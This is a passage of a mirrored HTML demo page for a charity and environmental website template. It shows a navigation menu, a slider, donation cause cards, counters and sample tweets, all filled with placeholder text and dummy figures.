<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from demos.codexcoder.com/labartisan/html/GreenForest/home_box.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Feb 2019 23:15:46 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Home Box Style</title>
    <link rel="shortcut icon" type="image/x-icon" href="assets/images/favicon.ico" />
    <!-- Plugin css -->
    <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/fonts/flaticon.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/animate.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/swiper.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/lightcase.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/jquery.nstSlider.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/flexslider.css" media="all" />

    <!-- own style css -->
    <link rel="stylesheet" type="text/css" href="assets/css/style.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/rtl.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/responsive.css" media="all" />

</head>

<body class="boxed">

    <div class="box-layout">

        <div class="box-style">
            <div class="color-btn">
                <a href="#"><i class="fa fa-cog fa-spin" aria-hidden="true"></i></a>
            </div>
            <div class="box-style-inner">
                <h3>Box Layout</h3>
                <div class="box-element">
                    <div class="box-heading">
                        <h5>HTML Layout</h5>
                    </div>
                    <div class="box-content">
                        <ul class="box-customize">
                            <li><a class="boxed-btn" href="#">Boxed</a></li>
                            <li><a class="wide-btn" href="#">Wide</a></li>
                            <li><a class="rtl-btn" href="#">Rtl</a></li>
                            <li><a class="ltl-btn" href="#">Ltl</a></li>
                        </ul>
                    </div>
                </div>
                <div class="box-element">
                    <div class="box-heading">
                        <h5>Backgroud Images</h5>
                    </div>
                    <div class="box-content">
                        <ul class="box-bg-img">
                            <li>
                                <a class="bg-1" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-2" href="#"><img src="assets/images/box-style/02.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-3" href="#"><img src="assets/images/box-style/03.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-4" href="#"><img src="assets/images/box-style/04.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-5" href="#"><img src="assets/images/box-style/05.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-6" href="#"><img src="assets/images/box-style/06.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-7" href="#"><img src="assets/images/box-style/07.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-8" href="#"><img src="assets/images/box-style/08.jpg" alt=""></a>
                            </li>
                        </ul>
                    </div>
                </div>
                <div class="box-element">
                    <div class="box-heading">
                        <h5>Backgroud Pattern</h5>
                    </div>
                    <div class="box-content">
                        <ul class="box-pattern-img">
                        <li>
                            <a class="pt-1" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/01.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-2" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/02.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-3" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/03.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-4" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/04.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-5" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/05.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-6" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/06.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-7" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/07.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-8" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/08.png"" alt=""></a>
                        </li>
                    </ul>
                    </div>
                </div>
            </div>
        </div>

        <header class="header-style-2 home-box-style">
            <div class="bg-logo-option">
                <div class="container">
                    <div class="row">
                        <div class="logo-option">
                            <a href="index.html"><img src="assets/images/home01/logo.png" alt="logo" class="img-responsive" /></a>
                        </div>
                        <!-- .logo-option -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-logo-option -->
            <!-- Start Menu -->
            <div class="bg-main-menu menu-scroll">
                <div class="container">
                    <div class="row">
                        <div class="main-menu">
                            <nav class="navbar text-center">
                                <!-- Brand and toggle get grouped for better mobile display -->
                                <div class="navbar-header">
                                    <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
								<span class="sr-only">Toggle navigation</span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
							  </button>
                                    <a class="navbar-brand" href="index.html"><img src="assets/images/home01/logo.png" alt="logo" class="img-responsive" /></a>
                                </div>
                                <!-- Collect the nav links, forms, and other content for toggling -->
                                <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                                    <ul class="nav navbar-nav">
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle active" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">HOME <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="index.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page one</a></li>
                                                <li><a href="home02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page two</a></li>
                                                <li><a href="home03.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page three</a></li>
                                                <li class="sub-active"><a href="home_box.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Box style</a></li>
                                                <li><a href="home_onepage.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home One Page</a></li>
                                                <li><a href="index-rtl.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> الصفحة الرئيسية رتل</a></li>
                                            </ul>
                                        </li>
                                        <li><a href="about.html">About</a></li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Services <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="services.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Services</a></li>
                                                <li><a href="service_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Service</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">pages<span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Our Team<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="team.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Team</a></li>
                                                        <li><a href="team_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Team</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Our project<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="project.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Projects</a></li>
                                                        <li><a href="project_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Project</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="shop.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop</a></li>
                                                        <li><a href="shop_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Shop</a></li>
                                                        <li><a href="shop_cart.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop Cart</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Campaign<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="campaign.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Campaign</a></li>
                                                        <li><a href="campaign_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Campaign</a></li>
                                                    </ul>
                                                </li>
                                                <li><a href="donate.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Donate Page</a></li>
                                                <li><a href="404_page.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> 404 Page</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Events <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="event.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Events</a></li>
                                                <li><a href="event_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Event</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Blog <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="blog.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Blog</a></li>
                                                <li><a href="blog_02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Blog style 02</a></li>
                                                <li><a href="blog_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Blog</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Gallery <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="gallery.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery</a></li>
                                                <li><a href="gallery_02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery 02</a></li>
                                                <li><a href="gallery_03.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery 03</a></li>
                                            </ul>
                                        </li>
                                        <li><a href="contact.html">contacts</a></li>
                                    </ul>
                                    <div class="menu-right-option">
                                        <div class="cart-option">
                                            <div class="cart-icon">
                                                <i class="fa fa-shopping-cart" aria-hidden="true"></i>
                                                <div class="count-cart">2</div>
                                            </div>
                                            <!-- .cart-icon -->
                                            <div class="cart-dropdown-menu">
                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="single_shop_cat.html"><img src="assets/images/home01/cart-img-1.jpg" alt="cart-img-1"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->

                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="#"><img src="assets/images/home01/cart-img-2.jpg" alt="cart-img-2"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->
                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="#"><img src="assets/images/home01/cart-img-3.jpg" alt="cart-img-3"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->
                                                <div class="total-price">
                                                    <p><span>Total Price :</span> $700 </p>
                                                </div>
                                                <!-- .total-prices -->
                                                <div class="checkout-btn">
                                                    <a href="#" class="btn btn-default">donate now</a>
                                                </div>
                                            </div>
                                            <!-- .cart-dropdown-menu -->
                                        </div>
                                        <!-- .cart-option -->

                                        <div class="search-box">
                                            <i class="fa fa-search first_click" aria-hidden="true" style="display: block;"></i>
                                            <i class="fa fa-times second_click" aria-hidden="true" style="display: none;"></i>
                                        </div>
                                        <div class="search-box-text">
                                            <form action="http://demos.codexcoder.com/labartisan/html/GreenForest/search">
                                                <input type="text" name="search" id="all-search" placeholder="Search Here">
                                            </form>
                                        </div>
                                    </div>
                                    <!-- .menu-right-option -->
                                </div>
                                <!-- .navbar-collapse -->
                            </nav>
                        </div>
                        <!-- .main-menu -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-main-menu -->
        </header>

        <!-- Start Slider Section -->


        <section class="bg-slider-option">
            <div class="slider-option slider-three">
                <div id="slider" class="carousel slide wow fadeInDown" data-ride="carousel">
                    <!-- Indicators -->
                    <ol class="carousel-indicators">
                        <li data-target="#slider" data-slide-to="0" class="active"></li>
                        <li data-target="#slider" data-slide-to="1"></li>
                        <li data-target="#slider" data-slide-to="2"></li>
                    </ol>
                    <!-- Wrapper for slides -->
                    <div class="carousel-inner" role="listbox">
                        <div class="item active">
                            <div class="slider-item">
                                <img src="assets/images/homebox/slider-img-1.jpg" alt="bg-slider-2">
                                <div class="slider-content-area">
                                    <div class="container">
                                        <div class="slider-content">
                                            <h3>help us</h3>
                                            <h2>save the world</h2>
                                            <p>Professionally mesh enterprise wide imperatives without world class paradigms. Dynamically deliver ubiquitous leadership awesome skills.</p>
                                            <div class="slider-btn">
                                                <a href="#" class="btn btn-default">join now</a>
                                                <a href="donate.html" class="btn btn-default">donate now</a>
                                            </div>
                                            <!-- .slider-btn -->
                                        </div>
                                        <!-- .carousel-caption -->
                                    </div>
                                    <!-- .container -->
                                </div>
                            </div>
                        </div>
                        <!-- .items -->

                        <div class="item">
                            <div class="slider-item">
                                <img src="assets/images/homebox/slider-img-2.jpg" alt="bg-slider-2">
                                <div class="slider-content-area">
                                    <div class="container">
                                        <div class="slider-content">
                                            <h3>help us</h3>
                                            <h2>save the world</h2>
                                            <p>Professionally mesh enterprise wide imperatives without world class paradigms. Dynamically deliver ubiquitous leadership awesome skills.</p>
                                            <div class="slider-btn">
                                                <a href="#" class="btn btn-default">join now</a>
                                                <a href="donate.html" class="btn btn-default">donate now</a>
                                            </div>
                                            <!-- .slider-btn -->
                                        </div>
                                        <!-- .carousel-caption -->
                                    </div>
                                    <!-- .container -->
                                </div>
                            </div>
                        </div>
                        <!-- .items -->

                        <div class="item">
                            <div class="slider-item">
                                <img src="assets/images/homebox/slider-img-3.jpg" alt="bg-slider-2">
                                <div class="slider-content-area">
                                    <div class="container">
                                        <div class="slider-content">
                                            <h3>help us</h3>
                                            <h2>save the world</h2>
                                            <p>Professionally mesh enterprise wide imperatives without world class paradigms. Dynamically deliver ubiquitous leadership awesome skills.</p>
                                            <div class="slider-btn">
                                                <a href="#" class="btn btn-default">join now</a>
                                                <a href="donate.html" class="btn btn-default">donate now</a>
                                            </div>
                                            <!-- .slider-btn -->
                                        </div>
                                        <!-- .carousel-caption -->
                                    </div>
                                    <!-- .container -->
                                </div>
                            </div>
                        </div>
                        <!-- .items -->
                    </div>
                    <!-- .carosoul-inner -->
                    <a class="left carousel-control" href="#slider" role="button" data-slide="prev">
                        <span class="fa fa-angle-left" aria-hidden="true"></span>
                    </a>
                    <a class="right carousel-control" href="#slider" role="button" data-slide="next">
                        <span class="fa fa-angle-right" aria-hidden="true"></span>
                    </a>
                </div>
            </div>
            <!-- .slider-option -->
        </section>

        <!-- End Slider Section -->


        <!-- Start Working  Section -->


        <section class="bg-working-section">
            <div class="container">
                <div class="row">
                    <div class="working-section">
                        <div class="section-header">
                            <h3>50,000+ </h3>
                            <h2>People Working With Us</h2>
                            <p>Professionally mesh enterprise wide imperatives without world class paradigms.Dynamically deliver ubiquitous leadership awesome skills.</p>
                        </div>
                        <!-- .section-header -->
                        <div class="row">
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="working-items">
                                    <div class="working-icon"><i class="flaticon-technology"></i></div>
                                    <!-- .working-icon -->
                                    <div class="working-content">
                                        <h4><a href="service_single.html">Use Solar Power</a></h4>
                                        <p>Credibly utcost efective an expertise and web enabled proces that improvements Completely seamless channels </p>
                                        <a href="#">read more<i class="fa fa-angle-double-right" aria-hidden="true"></i></a>
                                    </div>
                                    <!-- .working-content -->
                                </div>
                                <!-- .working-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="working-items">
                                    <div class="working-icon"><i class="flaticon-animals"></i></div>
                                    <!-- .working-icon -->
                                    <div class="working-content">
                                        <h4><a href="service_single.html">Animal Care</a></h4>
                                        <p>Credibly utcost efective an expertise and web enabled proces that improvements Completely seamless channels </p>
                                        <a href="#">read more<i class="fa fa-angle-double-right" aria-hidden="true"></i></a>
                                    </div>
                                    <!-- .working-content -->
                                </div>
                                <!-- .working-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="working-items">
                                    <div class="working-icon"><i class="flaticon-forest"></i></div>
                                    <!-- .working-icon -->
                                    <div class="working-content">
                                        <h4><a href="service_single.html">Save The Forest</a></h4>
                                        <p>Credibly utcost efective an expertise and web enabled proces that improvements Completely seamless channels </p>
                                        <a href="#">read more<i class="fa fa-angle-double-right" aria-hidden="true"></i></a>
                                    </div>
                                    <!-- .working-content -->
                                </div>
                                <!-- .working-items -->
                            </div>
                            <!-- .col-md-4 -->
                        </div>
                        <!-- .row -->
                    </div>
                    <!-- .working-section -->
                </div>
                <!-- .row -->
            </div>
            <!-- .container -->
        </section>


        <!-- End Working Section -->


        <!-- Start Count Section -->

        <section class="bg-count3-section">
            <div class="count3-overlay">
                <div class="container">
                    <div class="row">
                        <div class="count-option">
                            <div class="row">
                                <div class="col-md-3 col-sm-6 col-xs-6">
                                    <div class="count-items">
                                        <i class="flaticon-internet"></i>
                                        <span class="counter">25</span><span>+</span>
                                        <h4>GLOBALIZATION WORK</h4>
                                    </div>
                                    <!-- .count-items -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6 col-xs-6">
                                    <div class="count-items">
                                        <i class="flaticon-man"></i>
                                        <span class="counter">750</span><span>+</span>
                                        <h4>HAPPY DONATORS</h4>
                                    </div>
                                    <!-- .count-items -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6 col-xs-6">
                                    <div class="count-items">
                                        <i class="flaticon-rocket-launch"></i>
                                        <span class="counter">250</span>
                                        <h4>SUCCESS MISSION</h4>
                                    </div>
                                    <!-- .count-items -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6 col-xs-6">
                                    <div class="count-items">
                                        <i class="flaticon-people"></i>
                                        <span class="counter">1000</span>
                                        <h4>VOLUNTEER REACHED</h4>
                                    </div>
                                    <!-- .count-items -->
                                </div>
                                <!-- .col-md-3 -->
                            </div>
                            <!-- .row -->
                        </div>
                        <!-- .count-section -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
        </section>

        <!-- End Count Section -->

        <!-- Start Focus Cause Section -->

        <section class="bg-focus-cause-section">
            <div class="container">
                <div class="row">
                    <div class="focus-cause">
                        <div class="section-header">
                            <h2>Focused Causes</h2>
                            <p>Professionally mesh enterprise wide imperatives without world class paradigms.Dynamically deliver ubiquitous leadership awesome skills.</p>
                        </div>
                        <!-- .section-header -->
                        <div class="row">
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="cause-items">
                                    <a href="campaign_single.html"><img src="assets/images/home03/cause-img-1.jpg" alt="cause-img-1" class="img-responsive" /></a>
                                    <div class="cause-content">
                                        <div class="price-title">
                                            <div class="price-left">
                                                <h5>Raised:<span>$25.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                            <div class="price-right">
                                                <h5>Raised:<span>$50.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                        </div>
                                        <!-- .price-title -->
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" aria-valuemin="0" aria-valuemax="100" style="width:50%">
                                            </div>
                                            <!-- .progress-bar -->
                                        </div>
                                        <!-- .progress -->
                                        <h4><a href="campaign_single.html">Sustainable Agriculture</a></h4>
                                        <p>Credibly iplement interopriable that a just Continually cultivate awesome team.</p>
                                        <a href="donate.html" class="btn btn-default">donate Now</a>
                                    </div>
                                    <!-- .cause-content -->
                                </div>
                                <!-- .cause-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="cause-items">
                                    <a href="campaign_single.html"><img src="assets/images/home03/cause-img-2.jpg" alt="cause-img-2" class="img-responsive" /></a>
                                    <div class="cause-content">
                                        <div class="price-title">
                                            <div class="price-left">
                                                <h5>Raised:<span>$25.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                            <div class="price-right">
                                                <h5>Raised:<span>$50.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                        </div>
                                        <!-- .price-title -->
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" aria-valuemin="0" aria-valuemax="100" style="width:50%">
                                            </div>
                                            <!-- .progress-bar -->
                                        </div>
                                        <!-- .progress -->
                                        <h4><a href="campaign_single.html">Helping Young Planting</a></h4>
                                        <p>Credibly iplement interopriable that a just Continually cultivate awesome team.</p>
                                        <a href="donate.html" class="btn btn-default">donate Now</a>
                                    </div>
                                    <!-- .cause-content -->
                                </div>
                                <!-- .cause-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="cause-items">
                                    <a href="campaign_single.html"><img src="assets/images/home03/cause-img-3.jpg" alt="cause-img-3" class="img-responsive" /></a>
                                    <div class="cause-content">
                                        <div class="price-title">
                                            <div class="price-left">
                                                <h5>Raised:<span>$25.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                            <div class="price-right">
                                                <h5>Raised:<span>$50.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                        </div>
                                        <!-- .price-title -->
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" aria-valuemin="0" aria-valuemax="100" style="width:50%">
                                            </div>
                                            <!-- .progress-bar -->
                                        </div>
                                        <!-- .progress -->
                                        <h4><a href="campaign_single.html">Make Plants Alive</a></h4>
                                        <p>Credibly iplement interopriable that a just Continually cultivate awesome team.</p>
                                        <a href="donate.html" class="btn btn-default">donate Now</a>
                                    </div>
                                    <!-- .cause-content -->
                                </div>
                                <!-- .cause-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="cause-items">
                                    <a href="campaign_single.html"><img src="assets/images/home03/cause-img-4.jpg" alt="cause-img-4" class="img-responsive" /></a>
                                    <div class="cause-content">
                                        <div class="price-title">
                                            <div class="price-left">
                                                <h5>Raised:<span>$25.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                            <div class="price-right">
                                                <h5>Raised:<span>$50.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                        </div>
                                        <!-- .price-title -->
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" aria-valuemin="0" aria-valuemax="100" style="width:50%">
                                            </div>
                                            <!-- .progress-bar -->
                                        </div>
                                        <!-- .progress -->
                                        <h4><a href="campaign_single.html">Need Solar Panels</a></h4>
                                        <p>Credibly iplement interopriable that a just Continually cultivate awesome team.</p>
                                        <a href="donate.html" class="btn btn-default">donate Now</a>
                                    </div>
                                    <!-- .cause-content -->
                                </div>
                                <!-- .cause-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="cause-items">
                                    <a href="campaign_single.html"><img src="assets/images/home03/cause-img-5.jpg" alt="cause-img-5" class="img-responsive" /></a>
                                    <div class="cause-content">
                                        <div class="price-title">
                                            <div class="price-left">
                                                <h5>Raised:<span>$25.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                            <div class="price-right">
                                                <h5>Raised:<span>$50.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                        </div>
                                        <!-- .price-title -->
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" aria-valuemin="0" aria-valuemax="100" style="width:50%">
                                            </div>
                                            <!-- .progress-bar -->
                                        </div>
                                        <!-- .progress -->
                                        <h4><a href="campaign_single.html">Save The Ozone Layer</a></h4>
                                        <p>Credibly iplement interopriable that a just Continually cultivate awesome team.</p>
                                        <a href="donate.html" class="btn btn-default">donate Now</a>
                                    </div>
                                    <!-- .cause-content -->
                                </div>
                                <!-- .cause-items -->
                            </div>
                            <!-- .col-md-4 -->
                            <div class="col-md-4 col-sm-6 col-xs-6">
                                <div class="cause-items">
                                    <a href="campaign_single.html"><img src="assets/images/home03/cause-img-6.jpg" alt="cause-img-6" class="img-responsive" /></a>
                                    <div class="cause-content">
                                        <div class="price-title">
                                            <div class="price-left">
                                                <h5>Raised:<span>$25.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                            <div class="price-right">
                                                <h5>Raised:<span>$50.000</span></h5>
                                            </div>
                                            <!-- .price-left -->
                                        </div>
                                        <!-- .price-title -->
                                        <div class="progress">
                                            <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" aria-valuemin="0" aria-valuemax="100" style="width:50%">
                                            </div>
                                            <!-- .progress-bar -->
                                        </div>
                                        <!-- .progress -->
                                        <h4><a href="campaign_single.html">Save Water From Polution</a></h4>
                                        <p>Credibly iplement interopriable that a just Continually cultivate awesome team.</p>
                                        <a href="donate.html" class="btn btn-default">donate Now</a>
                                    </div>
                                    <!-- .cause-content -->
                                </div>
                                <!-- .cause-items -->
                            </div>
                            <!-- .col-md-4 -->
                        </div>
                        <!-- .row -->
                    </div>
                    <!-- .focus-cause -->
                </div>
                <!-- .row -->
            </div>
            <!-- .container -->
        </section>

        <!-- End Focus Cause Section -->


        <!-- Start People Say Section -->


        <section class="bg-people-say-section">
            <div class="people-say-overlay">
                <div class="container">
                    <div class="row">
                        <div class="people-say-section">
                            <div class="people-say-container">
                                <div class="swiper-wrapper">
                                    <div class="swiper-slide">
                                        <div class="people-say-items">
                                            <i class="fa fa-twitter" aria-hidden="true"></i>
                                            <p>Somrat Islam <a href="#">@Bonndu007Somrat</a> Feb 18Globally expeyiadite wireless expertise without progressive imperatives. Intrinsicly embrace holistic data after ethical from <a href="#"><span>@invisionapp: http://bit.ly/1VnL6yL </span></a></p>
                                            <p>02 Days ago</p>
                                        </div>
                                        <!-- .sponsors-items -->
                                    </div>
                                    <!-- .swiper-slide -->
                                    <div class="swiper-slide">
                                        <div class="people-say-items">
                                            <i class="fa fa-twitter" aria-hidden="true"></i>
                                            <p>Somrat Islam <a href="#">@Bonndu007Somrat</a> Feb 18Globally expeyiadite wireless expertise without progressive imperatives. Intrinsicly embrace holistic data after ethical from <a href="#"><span>@invisionapp: http://bit.ly/1VnL6yL </span></a></p>
                                            <p>02 Days ago</p>
                                        </div>
                                        <!-- .sponsors-items -->
                                    </div>
                                    <!-- .swiper-slide -->
                                    <div class="swiper-slide">
                                        <div class="people-say-items">
                                            <i class="fa fa-twitter" aria-hidden="true"></i>
                                            <p>Somrat Islam <a href="#">@Bonndu007Somrat</a> Feb 18Globally expeyiadite wireless expertise without progressive imperatives. Intrinsicly embrace holistic data after ethical from <a href="#"><span>@invisionapp: http://bit.ly/1VnL6yL </span></a></p>
                                            <p>02 Days ago</p>
                                        </div>
                                        <!-- .sponsors-items -->
                                    </div>
                                    <!-- .swiper-slide -->
                                    <div class="swiper-slide">
                                        <div class="people-say-items">
                                            <i class="fa fa-twitter" aria-hidden="true"></i>
                                            <p>Somrat Islam <a href="#">@Bonndu007Somrat</a> Feb 18Globally expeyiadite wireless expertise without progressive imperatives. Intrinsicly embrace holistic data after ethical from <a href="#"><span>@invisionapp: http://bit.ly/1VnL6yL </span></a></p>
                                            <p>02 Days ago</p>
                                        </div>
                                        <!-- .sponsors-items -->
